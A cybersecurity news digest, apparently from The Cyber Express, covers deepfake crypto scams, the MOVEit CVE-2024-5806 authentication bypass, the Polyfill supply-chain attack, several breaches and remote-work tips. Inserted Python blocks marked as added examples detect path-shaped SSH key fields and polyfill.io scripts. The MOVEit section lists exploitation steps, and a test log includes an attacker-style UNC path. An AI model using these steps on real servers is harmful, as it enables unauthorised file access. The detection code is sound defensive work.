
Scammers Promoted Fake Donald Trump Live Stream Urging Cryptocurrency Donations During Presidential Debate


A convincing live stream on a seemingly legitimate Donald Trump YouTube channel gained massive traction before Thursday's U.S. Presidential debate, reaching nearly half the subscriber count of the official Donald Trump YouTube channel before it was taken down. The channel and its Trump deepfake urged viewers to donate in cryptocurrency, promising substantial rewards in return. The video was titled with keywords related to the official Presidential debate between Trump and Biden and displayed a fake promotional website and a QR code for donations in Bitcoin, Ethereum, Dogecoin and Tether.

Fake Trump Cryptocurrency Promotion Scam Streamed Ahead of Presidential Debate

The timing of the fake live stream coincided with this week's scheduled debate between U.S. President Joe Biden and former President and challenger Donald J. Trump. The scammers appeared to be trading on actual statements Trump has made in support of cryptocurrency, paired with a looping AI-generated video in which he sits alongside the YouTuber Logan Paul and talks about promoting cryptocurrency in the United States if elected.

(Figure: Screenshot taken from the livestream.)

The fake video appears to be an edit of a podcast episode in which Trump joined the YouTuber to discuss the election, U.S. politics, his personal life and his opponent. The edited video displayed a QR code and a website (donaldtrump[.]gives) where viewers could be tricked into making donations. The website uses official Trump 2024 campaign branding and offers instructions for taking part in the "unique event", a multiplier that calculates how much cryptocurrency visitors would supposedly receive in return for their donation, and a "live" feed of donations to the listed cryptocurrency addresses.

(Figure: Cryptocurrency addresses involved with the scam.)

"During this unique event, you have the opportunity to take a share of 2,000 BTC & 50,000 ETH & 500,000,000 DOGE & 50,000,000 USDT. Have a look at the rules and don't miss out on this. You can only participate once!" the scam website stated. According to a WHOIS lookup, the domain was registered on June 27th, the day of the Presidential debate, with a Russian registrant.

YouTube Channel Connected To Scam Taken Down

The YouTube channel behind the promotion was taken down shortly after it was reported to YouTube, but the website promoted during the stream still appears to be up. The channel had about 1.38 million subscribers before its takedown, nearly half the subscriber count (2.9 million) of the official Donald J Trump YouTube channel.

(Figure: Email confirmation of channel takedown.)

It is unknown whether the live transaction feed on the scam website reflects real transactions; the listed addresses can be checked against a public block explorer, which would show whether any funds actually arrived. The full extent of the scam and the victim count are unknown; details of the campaign have been sent to Cyble Research and Intelligence Labs (CRIL) researchers for further investigation.

(Figure: Screenshot of alleged transactions.)

The campaign highlights the threat that AI-generated content poses to election-related processes and legitimate campaign donations, and the ease of impersonating candidates or other well-known figures. In a recent incident, crypto scammers took over the YouTube channel of Channel 7 News Australia to push dubious crypto investments using a deepfake of Elon Musk.


Data Security Officer from Philippines Admits to Hacking 93 Different Websites


A data security officer from the Manila Bulletin has admitted to hacking 93 websites, including government and private company sites, as well as servers abroad. The hacker, known by the alias "Kangkong," was arrested along with two others by the National Bureau of Investigation (NBI) Cybercrime Division on June 19 following reports of multiple unauthorized access attempts and breaches. Kangkong issued a public apology to President Marcos, the general public, and especially the military community for his actions.

Implications for Philippines National Security

Kangkong's hacking spree exposed significant weaknesses in the security of the affected organizations. Among the high-profile targets were the peacekeeping operations center website of the Armed Forces of the Philippines, the mail server of the National Security Council, and the Join the PH Army website.

(Figure: Arrested data officer Kangkong. Source: www.onenews.ph)

The hacker acknowledged the serious consequences of his actions, including the potential exposure of soldiers' sensitive data to foreign entities. "That's when I realized that we have many enemies and we should not be going against each other," Kangkong stated. In an interview with ABS-CBN, he said he had left specific pictures on the compromised websites as proof of his involvement.

Senior Technology Officer May Be Implicated

In his extrajudicial confession, Kangkong initially implicated Art Samaniego, Manila Bulletin's senior technology officer, as the person who ordered the hacking of several websites, a claim he later said he regretted. Samaniego has denied allegations that he ordered the hacking to boost his social media reach. The NBI Cybercrime Division has issued a subpoena for Samaniego to explain his side to the authorities, and the Manila Bulletin has suspended him pending an internal investigation. Kangkong also pointed to inadequate security on government and private-sector websites as a key factor in his ability to breach them. "Cybersecurity is not really a priority in the Philippines," he stated, urging organizations to invest in better security measures despite the associated costs.

Recently Disclosed Progress MOVEit Transfer Flaw Observed Being Actively Exploited


A newly disclosed vulnerability in Progress MOVEit Transfer has sparked concern among security practitioners, given the memory of last year's mass exploitation of a different MOVEit flaw by ransomware actors, which hit organizations such as the BBC. The new authentication bypass, designated CVE-2024-5806, could allow unauthorized access to sensitive data. MOVEit Transfer is built for large-scale enterprise use and advertises compliance with regulations such as PCI DSS and HIPAA. It supports several transfer methods, including SFTP and HTTPS, which makes it a critical component of many organizations' data-handling infrastructure. Progress initially withheld details of CVE-2024-5806, advising customers to patch before disclosure. On June 25th, 2024, Progress lifted the embargo and revealed that the flaw affects unpatched builds of MOVEit Transfer 2023.0 and later, as well as MOVEit Gateway 2024.0 and later.

Progress MOVEit Vulnerability Details

watchTowr Labs received details of the vulnerability from a user identifying as 'dav1d_bl41ne' on its IRC channel, an unusual route for vulnerability sharing, the researchers noted. They set up a test environment to reproduce it.

(Figure: Source: labs.watchtowr.com)

Debugger output from the test environment showed the server throwing exceptions and attempting to access files in unexpected ways. On further investigation, the researchers found that the SFTP service accepts a file path in place of the SSH public key during authentication: the server then reads the key from that path, so an attacker who can place a key file on the server controls which key is trusted. The researchers shared the following steps for exploiting the vulnerability:
  • Upload a public key file to the MOVEit Transfer server.
  • During SFTP public-key authentication, supply the server-side file path of that key in place of the key itself, and sign the authentication request with the matching private key.
  • The server loads the key from the path and accepts the login, giving access to the target account's files.
The flaw affects MOVEit Transfer 2023.0 and later, as well as MOVEit Gateway 2024.0 and later, until patched. Progress describes it as an "Improper Authentication vulnerability" in the SFTP module that can lead to "Authentication Bypass in limited scenarios", potentially giving attackers unauthorized access to sensitive files. The vulnerability is particularly concerning because the software is widely deployed in enterprises, making it an attractive target for APT groups, ransomware gangs and other criminal actors. Progress has shared the following interim recommendations to reduce exposure; they do not replace upgrading to a fixed release:
  • Block public inbound RDP access to MOVEit Transfer server(s).
  • Limit outbound access on MOVEit Transfer server(s) to only trusted endpoints.
According to a post on X by The Shadowserver Foundation, exploitation attempts were observed soon after disclosure.

(Figure: MOVEit vulnerability exploitation. Source: X.com)
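As an added illustration, not code from watchTowr, Progress or the page, the following Python models the check a hardened SFTP key handler should apply to the public-key field, and runs the same check as a detection over constructed log lines. The log line format, the field names (user=, method=, key=) and the key material are assumptions for the example; MOVEit's real SFTP log format is not given on the page, so LOG_RE would need to be adapted to it. The point is simply that a value which parses as a filesystem or UNC path rather than as OpenSSH key material should never reach key-loading code, and is worth an alert if it shows up in an authentication log.

```python
"""Added example (not watchTowr's, Progress's or MOVEit's code).

Strictly parse an SSH public-key field and flag values that look like a
file path instead, which is the pattern described for CVE-2024-5806.
Log format and sample data below are constructed for the example.
"""
import base64
import re
import struct

# Key types the validator accepts (assumption: what an SFTP service would allow).
KEY_TYPES = (
    "ssh-ed25519",
    "ssh-rsa",
    "ecdsa-sha2-nistp256",
    "ecdsa-sha2-nistp384",
    "ecdsa-sha2-nistp521",
)

# UNC path, Windows drive path, POSIX absolute path, or relative traversal.
PATH_RE = re.compile(r"^(?:\\\\[^\\/\s]+[\\/]|[A-Za-z]:[\\/]|/|\.\.?[\\/])")

# Hypothetical log format: ... user=<name> method=publickey key="<value>" ...
LOG_RE = re.compile(r'user=(?P<user>\S+) method=publickey key="(?P<key>[^"]*)"')


def is_openssh_public_key(value):
    """Accept only '<type> <base64 blob> [comment]' where the blob's first
    length-prefixed string repeats the type, as the OpenSSH wire format
    requires. A path or arbitrary text never passes this check."""
    parts = value.strip().split()
    if len(parts) < 2 or parts[0] not in KEY_TYPES:
        return False
    try:
        blob = base64.b64decode(parts[1], validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    if len(blob) < 4:
        return False
    (name_len,) = struct.unpack(">I", blob[:4])
    return blob[4:4 + name_len] == parts[0].encode()


def looks_like_path(value):
    """True when the value starts like a filesystem path rather than key data."""
    return bool(PATH_RE.match(value.strip()))


def classify_key_field(value):
    """'key' for well-formed key material, 'path' for a path-shaped value
    (the CVE-2024-5806 pattern), 'malformed' for anything else."""
    if is_openssh_public_key(value):
        return "key"
    if looks_like_path(value):
        return "path"
    return "malformed"


def scan_log(lines):
    """Return (user, verdict) for every public-key authentication line."""
    hits = []
    for line in lines:
        match = LOG_RE.search(line)
        if match:
            hits.append((match["user"], classify_key_field(match["key"])))
    return hits


def _wire_blob(key_type, payload):
    """Build the base64 part of an OpenSSH public key from its wire fields."""
    blob = struct.pack(">I", len(key_type)) + key_type.encode() + payload
    return base64.b64encode(blob).decode()


# Constructed 32-byte "ed25519" public key (not a real key pair).
GOOD_KEY = "ssh-ed25519 " + _wire_blob("ssh-ed25519", struct.pack(">I", 32) + b"\x01" * 32) + " alice@example"

# Constructed log lines in the hypothetical format above.
SAMPLE_LOG = [
    f'2024-06-26T09:12:01Z sftp src=203.0.113.7 user=alice method=publickey key="{GOOD_KEY}" result=ok',
    r'2024-06-26T09:13:44Z sftp src=198.51.100.9 user=alice method=publickey key="C:\MOVEitTransfer\Files\guest\attacker.pub" result=ok',
    r'2024-06-26T09:14:02Z sftp src=198.51.100.9 user=bob method=publickey key="\\198.51.100.9\share\key.pub" result=fail',
    '2024-06-26T09:15:30Z sftp src=192.0.2.4 user=carol method=publickey key="ssh-rsa not-base64!!" result=fail',
    '2024-06-26T09:16:00Z sftp src=192.0.2.5 user=dave method=password result=ok',
]

if __name__ == "__main__":
    for user, verdict in scan_log(SAMPLE_LOG):
        flag = "ALERT" if verdict != "key" else "ok"
        print(f"{flag:5} user={user} key_field={verdict}")
```

Running the block prints one line per public-key login attempt; the two path-shaped values (a local Windows path and a UNC path to an attacker host) are flagged, the malformed blob is flagged as well, and the password login is ignored. The same `is_openssh_public_key` check is what a server should apply before passing the field to any library that might interpret a non-key string as a file reference.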

Implications of the MOVEit Vulnerability

The discovery of this vulnerability soon after major exploitation last year has reignited discussions about the security of file transfer solutions in enterprise environments. The potential for unauthorized access to sensitive files could have far-reaching consequences for the large number of enterprises that rely on MOVEit Transfer. While the full extent of the vulnerability's impact is still being assessed, the incident has sparked more debate about responsible disclosure practices in the cybersecurity community. Some argue that early, private notifications to affected parties are crucial, while others advocate for more transparent, public disclosures to ensure widespread awareness and prompt action. As the situation develops, IT administrators and security professionals are advised to stay vigilant, monitor for any signs of exploitation, and implement recommended security measures to protect their MOVEit Transfer deployments.  

A Step-by-Step Guide to Getting a SOC 2® Report

Ensuring the security of your customers’ and partners’ data is paramount in today’s digital environment. That’s why Service Organization Control 2 (SOC 2®) compliance has emerged as a widely recognized cybersecurity audit framework. SOC 2® reporting has been adopted by more businesses to demonstrate their commitment to strong cybersecurity practices. Let’s explore what a SOC 2® report...



Scammers Spotted Promoting Fake Olympics Cryptocurrency With AI Generated Imagery


Scammers are exploiting the buzz around the 2024 Paris Olympics to lure victims into investing in initial coin offerings (ICOs). These scams promise big returns on "Olympic" tokens, and the campaigns manufacture hype through fake websites, AI-generated images and social media promotion.

Olympics Initial Coin Offerings (ICO) Fraud

Researchers from Trend Micro uncovered a recent scheme that claimed to offer an official "Olympic Games Token" for sale. The ICO domain, theolympictoken[.]com, was registered on March 30, 2024, and the site went live a day later. The site displayed the legitimate Olympics 2024 logo and a countdown to the event to look like a real project.

(Figure: Olympic Games Token ICO. Source: trendmicro.com)

It linked to a "whitepaper", the document that is supposed to explain a project's technology and goals, but the link led nowhere useful: instead of details, it dumped visitors on the official Olympics website. Red flag number one. A Twitter account and Telegram channel pushed followers to buy tokens as soon as possible. When the original site was shut down, a near-identical one (olympictokensolana[.]com) popped up under a new name. The researchers spotted at least ten other websites using 2024 Olympics branding to lure victims into ICO scams; some were shut down shortly after discovery.

Use of AI-Generated Images Olympics in ICO Scams

(Figure: Olympics crypto ICO. Source: trendmicro.com)

The researchers remarked that AI-generated images are becoming increasingly common in ICO scams, as they offer a cheap and fast way to create convincing lures. Cybercriminals can also use AI to generate text, correct spelling and grammar, and write in languages they do not speak.

(Figure: Olympics ICO AI-generated imagery. Source: trendmicro.com)

The researchers spotted at least three other Olympics ICO scam websites using AI-generated imagery for promotion.

Spotting Fake ICO Campaigns

ICOs have gained significant attention as cryptocurrency continues to be adopted in various industries. While most new tokens lack utility and are simply memecoins, it does not always mean they are scams. Investors should be vigilant and look out for potential scams and rug-pulls. A legitimate ICO should have a proper website and social media presence, a transparent team, an active community, a comprehensive whitepaper, legitimacy of claims, token distribution, smart contract audit, and liquidity management. The researchers have shared the following guidelines to help identify such scams:
  • Proper website and social media presence: scam sites are often poorly designed or lack an active social media presence.
  • Transparent team: Cross-check the identities and credentials of the teams behind the offering. Anonymity is a red flag.
  • Active community: Genuine projects have engaged followers on platforms like Discord, Twitter or Telegram, which suggests genuine interest and support.
  • Comprehensive whitepaper: A whitepaper that outlines the project's goals, utility, and technical aspects, which demonstrates a thorough understanding of the project's concept and planning.
  • Legitimacy of claims: Claims backed by verifiable evidence, such as partnerships, use cases, and endorsements.
  • Token distribution: Avoid projects with highly concentrated token ownership which might increase the chances of exit scams.
  • Smart contract audit: Audit by reputable third-parties, which identify vulnerabilities.
  • Liquidity management: Liquidity is locked to prevent premature withdrawals and is decentralized among the community, which secures investors' funds.
In the case of the Olympic Games Token, the website raised several red flags such as a very low number of token holders and an invalid whitepaper link. Investors and those interested in cryptocurrency should follow adequate precautions to avoid falling victim to such scams. Experts have been monitoring Olympics-related search engine results and social media activity to counter fraudulent ticketing scams and coordinated disinformation campaigns.

South Korean ISP Accused of Installing Malware on Devices of 600,000 Who Used Torrenting Services


South Korean telecommunications giant KT is under investigation for allegedly hacking the systems of customers who used torrent-based services such as web hard drives (Webhard), a popular file-sharing service in the country. The campaign, which reportedly ran for about five months, affected an estimated 600,000 customers, and the police investigation indicates that KT may have operated a dedicated malware team.

Malware Infiltrated Systems of Torrenting Subscribers

The incident came to light in May 2020, when numerous web hard drives suddenly stopped working and users flooded company forums with complaints about unexplained errors. An investigation revealed that malware had infiltrated the "Grid Program", software that enables direct data exchange between users.

(Figure: KT South Korean ISP malware. Source: mnews.jtbc.co.kr)

The malware, designed to interfere with BitTorrent traffic, was allegedly used to monitor and control the internet activity of KT subscribers. Police believe the motive was to reduce network costs, since peer-to-peer transfers are expensive for internet service providers. KT, however, claims it was merely managing traffic on its network to ensure a smooth user experience, and has characterized the Webhard services themselves as malicious. After raids on KT facilities, investigators from the Gyeonggi Southern Police Agency concluded that the ISP may have violated communications and network laws. A follow-up police investigation found that KT operated a dedicated team responsible for developing, distributing and operating the malware. The activity was traced to KT's Bundang IDC Center, one of its data centers. Over five months, an estimated 20,000 PCs were infected daily. The malware reportedly created strange folders, made files invisible and disabled web hard programs.

Legal and Ethical Implications

KT and Webhard companies have a history of conflict, including lawsuits. While a previous court ruling sided with KT on traffic blocking of grid services, the current situation differs significantly: KT is alleged to have planted malicious code on individual users' PCs without consent or explanation. South Korean legal experts question KT's methods, suggesting the company could have pursued formal procedures through its legal team instead of resorting to hacking. The incident raises serious concerns about privacy, corporate responsibility, and how far internet service providers may go in controlling network traffic. It has also raised concerns about the security of KT customers' data, with many wondering what other sensitive information may have been compromised. The company's CEO has since resigned, and the company's reputation has taken a significant hit.

Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Polyfill Supply Chain Attack Compromises Over 100,000 Websites


A widespread supply chain attack has hit more than 100,000 websites, including notable platforms such as JSTOR, Intuit and the World Economic Forum. The attack stems from the polyfill.io domain, which served the popular open-source Polyfill.js library used to support older browsers. In February the domain and the project's GitHub account were acquired by the Chinese company Funnull, and the service subsequently began injecting malware into sites that embed scripts from cdn.polyfill.io. The malicious code redirects mobile users to sports betting or pornographic sites via a fake Google Analytics domain.

Malicious Polyfill Injection and Its Impact

Researchers stated that the injected malware is generated dynamically based on HTTP headers, which makes it hard to detect and suggests multiple attack variants. The Polyfill injection is a textbook supply chain attack on a widely used library.

(Figure: At least 104,183 websites might be affected. Source: publicwww.com)

Researchers from Sansec decoded one variant that redirects mobile users to a sports betting site using a fake Google Analytics domain. The malware employs techniques to evade detection and frustrate reverse engineering, including:
  •  Activating only on specific mobile devices at certain hours
  •  Avoiding execution when an admin user is detected
  •  Delaying activation when web analytics services are present
The attack's scope is significant, with Google already blocking Google Ads for e-commerce sites using polyfill.io. Researchers later reported that their infrastructure had been subjected to DDoS attacks after reporting on the campaign.

Mitigation and Recommendations

Andrew Betts, the original Polyfill author, took to X to advise against using Polyfill altogether, stating that modern browsers no longer require it. He added that he had no say in the sale of the project and never owned the domain, and cautioned that serving third-party scripts on a website is a major security concern.

(Figure: Source: X.com (@triblondon))

(Figure: Source: X.com (@triblondon))

Experts have set up a domain (polykill.io) to warn about the compromise of the project and recommend the following steps for website owners:
  • Immediately remove all usage of cdn.polyfill.io from websites and projects.
  • If a polyfill is still needed, replace it with a mirror such as those offered by Fastly and Cloudflare; Fastly saved and hosts an earlier version of the project's codebase (https://polyfill-fastly.io/) from before its sale to Funnull. A mirror is still a third-party script dependency, so dropping the polyfill or self-hosting it is the stronger fix.
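The two steps above, as an added example in Python (not code from Sansec, Cloudflare, Fastly or polykill.io): audit HTML for script and preload references whose host is polyfill.io or a subdomain, and rewrite them to the Fastly mirror the page names. The sample HTML is constructed, and the assumption that the mirror keeps the original service's URL layout is the example's, not the page's. One caveat worth stating: Subresource Integrity could not have protected against this takeover, because the polyfill.io service tailored its output to the requesting User-Agent so there was no single hash to pin; that is why removing the dependency or self-hosting a fixed bundle is the durable fix, and a mirror only moves the trust.

```python
"""Added example (not Sansec's, Cloudflare's, Fastly's or polykill.io's code).

Audit HTML for script and preload references to the hijacked polyfill.io
domain and produce a copy that points at the Fastly mirror instead.
The HTML sample is constructed for the example.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

HIJACKED_DOMAIN = "polyfill.io"       # cdn.polyfill.io and any other subdomain
MIRROR_HOST = "polyfill-fastly.io"    # assumption: same URL layout as the original service

# Scheme (or scheme-relative //) plus host of any polyfill.io URL, up to the path.
HIJACKED_URL_RE = re.compile(r"(?:https?:)?//(?:[\w-]+\.)*polyfill\.io(?=[/\"'\s?])", re.I)


def is_hijacked_url(url):
    """True for absolute or scheme-relative URLs whose host is polyfill.io or a subdomain."""
    host = urlsplit(url).hostname
    if not host:
        return False  # relative path: served from our own origin
    host = host.lower()
    return host == HIJACKED_DOMAIN or host.endswith("." + HIJACKED_DOMAIN)


class ThirdPartyScriptAuditor(HTMLParser):
    """Collects <script src> and <link rel=preload/modulepreload/prefetch href>
    references that load from the hijacked domain."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = {name: (value or "") for name, value in attrs}
        url = None
        if tag == "script":
            url = attrs.get("src")
        elif tag == "link" and attrs.get("rel", "").lower() in ("preload", "modulepreload", "prefetch"):
            url = attrs.get("href")
        if url and is_hijacked_url(url):
            self.findings.append({
                "line": self.getpos()[0],
                "tag": tag,
                "url": url,
                # Recorded for completeness; SRI could not pin polyfill.io output anyway.
                "integrity": "integrity" in attrs,
            })


def audit_html(html):
    """Return one finding per reference to the hijacked domain, in document order."""
    parser = ThirdPartyScriptAuditor()
    parser.feed(html)
    parser.close()
    return parser.findings


def rewrite_to_mirror(html):
    """Point every polyfill.io URL at the Fastly mirror, keeping path and query."""
    return HIJACKED_URL_RE.sub("https://" + MIRROR_HOST, html)


# Constructed page: two script tags and a preload hint pointing at the hijacked
# domain, plus two references that must not be flagged.
SAMPLE_HTML = """<!doctype html>
<html><head>
<link rel="preload" as="script" href="https://cdn.polyfill.io/v3/polyfill.min.js?features=es6">
<script src="https://cdn.polyfill.io/v3/polyfill.min.js?features=es6"></script>
<script src="//polyfill.io/v3/polyfill.min.js"></script>
<script src="https://static.example.com/vendor.js"></script>
<script src="/static/app.js" integrity="sha384-constructed-placeholder"></script>
</head><body></body></html>"""

if __name__ == "__main__":
    for finding in audit_html(SAMPLE_HTML):
        print(f"line {finding['line']}: <{finding['tag']}> loads {finding['url']}")
    print(rewrite_to_mirror(SAMPLE_HTML))
```

Running it reports the preload hint and both script tags (lines 3 to 5 of the sample) and leaves the first-party and unrelated third-party scripts alone; the rewritten copy contains no reference to the hijacked domain. To use it on a real site, feed it each rendered page, since many sites pull the polyfill in through a template rather than a static file.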
The website cautioned of the risks associated with the takeover of the project:
"There are many risks associated with allowing an unknown foreign entity to manage and serve JavaScript within your web application. They can quietly observe user traffic, and if malicious intent were taken, they can potentially steal usernames, passwords and credit card information directly as users enter the information in the web browser."
Cloudflare has also published its findings and recommendations in response to the concerns. The company stated in a blog post:
"The concerns are that any website embedding a link to the original polyfill.io domain will now be relying on Funnull to maintain and secure the underlying project to avoid the risk of a supply chain attack. Such an attack would occur if the underlying third party is compromised or alters the code being served to end users in nefarious ways, causing, by consequence, all websites using the tool to be compromised."
This incident is a stark reminder of the security implications of relying on external code libraries and third-party scripts, of the importance of vigilance in maintaining website integrity, and of the potential for malicious takeover of massively deployed projects.

Neiman Marcus Alerts Customers After Data Breach Exposes Information of 64,472 Individuals


Neiman Marcus has notified customers of a data breach that occurred in May 2024 and may have exposed sensitive personal information. The breach, affecting approximately 64,472 customers, involved unauthorized access to a cloud database platform used by the luxury retailer and operated by the third-party provider Snowflake. In a conversation with The Cyber Express, a Neiman Marcus spokesperson confirmed the breach: "Neiman Marcus Group (NMG) recently learned that an unauthorized party gained access to a cloud database platform used by NMG that is provided by a third party, Snowflake." The spokesperson added, "Promptly after discovering the incident, NMG took steps to contain it, including by disabling access to the platform."

Neiman Marcus Data Breach Confirmed

The breach compromised a range of personal data, including customer names, contact details, dates of birth and gift card numbers. "Based on our investigation, the unauthorized party obtained certain personal information stored in the platform," the spokesperson continued, clarifying that "The types of personal information affected varied by individual, and included information such as name, contact information, date of birth, and Neiman Marcus or Bergdorf Goodman gift card numbers (but without gift card PINs)." Neiman Marcus has launched an investigation with outside cybersecurity experts and notified law enforcement. In line with regulatory requirements, the company has begun notifying affected customers and has reported the breach to the Maine Attorney General's office. The retailer advises customers to monitor their financial statements for suspicious activity and has provided resources for those concerned about identity theft.

Mitigation Against the Neiman Marcus Data Leak

"We also began an investigation with assistance from leading cybersecurity experts and notified law enforcement authorities," the spokesperson emphasized. Customers are encouraged to request free credit reports, report any suspected fraud to law enforcement and the Federal Trade Commission, and consider placing a security freeze on their credit files as precautionary measures. Neiman Marcus Group, Inc., based in Dallas, Texas, is a popular luxury retailer that oversees brands such as Neiman Marcus, Bergdorf Goodman, Horchow, and Last Call. Since September 2021, it has been under the ownership of a consortium of investment firms led by Davidson Kempner Capital Management, Sixth Street Partners, and Pacific Investment Management. Following this Neiman Marcus data leak, the firm has established a dedicated toll-free hotline (1-885-889-2743) for affected customers seeking further information or assistance related to the data breach incident. 

LockBit Claims Ransomware Attack on U.S. Federal Reserve


The LockBit ransomware group is claiming that it hacked into systems at the U.S. Federal Reserve and stole 33TB of data that it will begin leaking as early as Tuesday if the institution doesn’t pay the unspecified ransom. The notorious cybercriminals announced the attack on its dark web leak site on June 23, giving the..


Google’s Project Naptime Aims for AI-Based Vulnerability Research


Security analysts at Google are developing a framework that they hope will enable large language models (LLMs) to eventually be able to run automated vulnerability research, particularly analyses of malware variants. The analysts with Google’s Project Zero – a group founded a decade ago whose job it is to find zero-day vulnerabilities – have been..


Airbnb’s Ban on Indoor Security Cameras: What It Means for Your Personal Cybersecurity

Effective April 30, 2024 Airbnb, the global vacation rental giant, announced a significant policy change: the prohibition of all indoor security cameras in its listings worldwide. This decision, aims to bolster the privacy of guests and address longstanding concerns about hidden cameras. While the majority of Airbnb’s over 7 million listings did not report having […]


Work From Home Security Checklist: Top Cybersecurity Tips for Remote Workers


When transitioning to remote work, the dynamics drastically change from working within a dedicated office environment tailored to the tasks at hand. Adjusting to this new setting can pose challenges in ensuring responsible handling of sensitive company data. In this article, The Cyber Express (TCE) Team delves into essential cybersecurity measures your company should implement or may already have in place. TCE also emphasizes actions one can take personally, whether they're accessing networks from home or public locations. Both employers and employees share the responsibility of adhering to strong security protocols, especially with the rise of cyber threats. As organizations increasingly prioritize data protection and server security, it's crucial to stay informed about the latest cybersecurity tips for remote work environments. Keep reading to discover key steps to strengthen your cybersecurity posture while working remotely.

Cybersecurity Tips for Remote Workers

Know Your Organization's Cyberwork Policies
Understanding your organization's cyberwork policies ensures remote workers adhere to established protocols, safeguarding sensitive data. These policies typically include guidelines on using secure connections through VPNs, handling confidential information, and using approved applications. By following these protocols, the risk of phishing or malware attacks is reduced as vulnerabilities from unprotected networks and devices are minimized. Awareness of these policies empowers employees to identify and report suspicious activities promptly, facilitating swift responses to potential threats.
Use Only Approved Devices
Using devices approved by your organization is critical for cybersecurity as it ensures compliance with company security standards. Approved devices are equipped with essential security measures such as firewalls, antivirus software, and encryption protocols, effectively reducing vulnerabilities. Regular monitoring and updates ensure these devices remain secure with the latest patches, enhancing protection against unauthorized access and cyber threats. Moreover, using approved devices ensures compatibility with secure networks and systems, maintaining overall cybersecurity integrity.
Implement the Principle of Least Privilege
Least privilege means each account holds only the access its role requires, so a compromised or misused account can reach only a limited part of the environment. Strong authentication such as two-factor authentication (2FA) verifies who is behind the account. Access rights should be reviewed and pruned regularly, which matters even more with remote staff, because roles change, one-off grants linger, and accounts of people who have left are easy to overlook.
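One way to make the periodic access review concrete, as an added example that is not part of the original article: the script below takes a hypothetical role-to-permission baseline and a constructed dump of what each account actually holds, and reports excess grants, stale accounts and accounts whose role the baseline does not define. Role names, permission strings, user names and dates are all assumptions made up for the example.

```python
"""Periodic least-privilege access review.

Added example for the tip above, not code from the article. It assumes a
role-to-permission baseline and a dump of the grants each account actually
holds (both constructed here) and reports what a reviewer acts on:
  excess_privilege  grants beyond what the account's role allows
  stale_account     no sign-in for more than MAX_IDLE_DAYS
  unknown_role      a role the baseline does not define (allowed nothing)
"""
from datetime import date

MAX_IDLE_DAYS = 90
REVIEW_DATE = date(2024, 6, 28)  # fixed "today" so the run is reproducible

# Hypothetical baseline: the only permissions each role should ever hold.
ROLE_BASELINE = {
    "support": {"tickets:read", "tickets:write"},
    "finance": {"invoices:read", "invoices:write", "reports:read"},
    "engineer": {"repo:read", "repo:write", "ci:run"},
}

# Constructed directory dump: what each account holds today.
ACCOUNTS = [
    {"user": "alice", "role": "support",
     "perms": {"tickets:read", "tickets:write"}, "last_login": date(2024, 6, 20)},
    {"user": "bob", "role": "finance",  # repo:write was granted for a one-off task
     "perms": {"invoices:read", "invoices:write", "reports:read", "repo:write"},
     "last_login": date(2024, 6, 25)},
    {"user": "carol", "role": "engineer",  # on leave, account untouched since January
     "perms": {"repo:read", "repo:write", "ci:run"}, "last_login": date(2024, 1, 3)},
    {"user": "dave", "role": "contractor",  # role never added to the baseline
     "perms": {"repo:read"}, "last_login": date(2024, 6, 1)},
]


def review_access(accounts, baseline, today, max_idle_days=MAX_IDLE_DAYS):
    """Return sorted (user, finding, detail) tuples for every deviation found."""
    findings = []
    for acct in accounts:
        allowed = baseline.get(acct["role"])
        if allowed is None:
            # An undefined role has no sanctioned access, so every grant is excess.
            findings.append((acct["user"], "unknown_role", acct["role"]))
            allowed = set()
        excess = acct["perms"] - allowed
        if excess:
            findings.append((acct["user"], "excess_privilege", ",".join(sorted(excess))))
        idle_days = (today - acct["last_login"]).days
        if idle_days > max_idle_days:
            findings.append((acct["user"], "stale_account", f"{idle_days} days idle"))
    return sorted(findings)


def run_review(today=REVIEW_DATE):
    """Run the review against the constructed dump; returns the findings list."""
    return review_access(ACCOUNTS, ROLE_BASELINE, today)


if __name__ == "__main__":
    for user, finding, detail in run_review():
        print(f"{user:<8} {finding:<17} {detail}")
```

Treating an unknown role as "allowed nothing" is deliberate: a grant that no baseline explains is exactly the kind of access that accumulates unnoticed, and the safe default is to surface it rather than skip it. In a real environment the inputs would come from the identity provider or directory export, and the findings feed a ticket queue rather than stdout.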
Secure Home Wi-Fi Networks
Securing your home Wi-Fi network is essential when working remotely. Use a strong, unique Wi-Fi passphrase and enable WPA3, or WPA2 with AES if your router does not support WPA3; never rely on WEP or WPA with TKIP. Change the router's default administrator credentials, disable remote administration and WPS, and keep the router firmware updated so known vulnerabilities are patched. Where the router supports it, put work devices on a separate network or guest VLAN from personal and smart-home devices, so a compromised gadget cannot reach your work machine.
Enable Two-Factor Authentication (2FA)
Two-factor authentication adds a second form of verification alongside the password, so a stolen or guessed password alone does not grant access. Not all second factors are equal: SMS codes can be captured through SIM swapping and phishing, authenticator apps are considerably better, and hardware security keys or passkeys (FIDO2) resist phishing outright because the credential is bound to the legitimate site. Use the strongest factor your organization's services support, especially for accounts that handle sensitive work data.
Use Strong, Unique Passwords
Protect work accounts and devices with strong, unique passwords. Length matters more than forced character classes; a long passphrase is both stronger and easier to remember than a short string of symbols. Never reuse a password across accounts, so that one breached service does not expose the others through credential stuffing. A password manager generates and stores complex passwords for you, which removes the temptation to reuse them or write them down.
Use Antivirus and Antimalware Software
Run reputable antivirus or endpoint protection software to detect and block malware such as infostealers and ransomware, keep its engine and signatures updated so it recognises current threats, and run periodic scans. Treat it as one layer rather than a guarantee: it will not catch everything, which is why the other measures here still matter.
Use a Virtual Private Network (VPN)
Use a VPN to encrypt the traffic between your device and the corporate network, which prevents interception on untrusted Wi-Fi such as a café or hotel network. Connect through the VPN your organization provides before accessing work systems, whether at home or in a public place. Keep in mind that a VPN protects the connection, not the endpoint: malware already on the device still sees everything you do.
Keep Software Updated and Data Backed Up
Keep operating systems, applications and security software up to date, and turn on automatic updates so patches for actively exploited vulnerabilities are applied promptly, including firmware. Back up work data regularly to a cloud service or an external drive, and keep at least one copy that is offline or versioned so ransomware cannot encrypt the backup together with the original. Automate the backups and test a restore occasionally; a backup that has never been restored is an assumption, not a safeguard.
Have a Plan of Action for Cyberattacks
